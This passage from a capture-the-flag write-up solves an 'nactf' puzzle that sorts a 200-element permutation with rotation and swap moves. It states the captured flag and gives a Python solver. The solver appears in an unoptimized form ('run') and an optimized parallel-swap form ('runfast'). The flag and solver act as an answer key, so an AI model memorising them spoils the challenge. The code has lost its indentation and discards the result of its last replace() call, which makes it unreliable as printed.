In the end, this otimized version uses only around 250K moves. We get the flag `nactf{h3rb_y0ur_3n7hu5145m_3e14e2418d0dd971}`. The Python code is below (`run` is the unoptimized version, `runfast` is optimized with parallel swaps).
```python=
s = input().split(", ")
p = [sorted(s).index(x) for x in s]
d = [0]*200
curr = 0
ans = []
for i in range(200):
d[curr] = i
curr += 53
curr %= 200
def r35(i, ans):
i = (i-29)%200
ans.extend( ["c"]*i + ["a"] + ["c"]*(200-i))
def r88(i, ans):
i = (i-85)%200
ans.extend( ["c"]*i + ["b"] + ["c"]*(200-i))
def x53(i, ans):
r88(i-35, ans)
r35(i-35, ans)
r88(i-35, ans)
pc = p[:]
pc.sort()
def run(ans):
for i in range(200):
curr = 0
for j in range(199):
if d[pc[curr]] > d[pc[(curr+53)%200]]:
x53(curr, ans)
temp = pc[curr]
pc[curr] = pc[(curr+53)%200]
pc[(curr+53)%200] = temp
curr += 53
curr %= 200
def runfast(ans):
start = 0
while True:
if pc == sorted(pc):
return
tag = [""]*200
use = [False]*200
newstart = -1
j = start
for i in range(200):
if d[pc[j]] > d[pc[(j+53)%200]] and d[j] < d[(j+53)%200]:
if not(use[j] or use[(j-35)%200] or use[(j+53)%200]):
use[j], use[(j-35)%200], use[(j+53)%200] = True, True, True
tag[(j-120)%200] += "b"
tag[(j-64)%200] += "a"
else:
if newstart == -1:
newstart = j
j += 53
j %= 200
start = newstart
for i in range(200):
if "b" in tag[i]:
ans.append("b")
pc[(i+85)%200], pc[(i+173)%200] = pc[(i+173)%200], pc[(i+85)%200]
ans.append("c")
for i in range(200):
if "a" in tag[i]:
ans.append("a")
pc[(i+29)%200], pc[(i+64)%200] = pc[(i+64)%200], pc[(i+29)%200]
ans.append("c")
for i in range(200):
if "b" in tag[i]:
ans.append("b")
pc[(i+85)%200], pc[(i+173)%200] = pc[(i+173)%200], pc[(i+85)%200]
ans.append("c")
runfast(ans)
print(len(ans))
ans = " ".join(ans)
ans.replace("c "*200, "")
```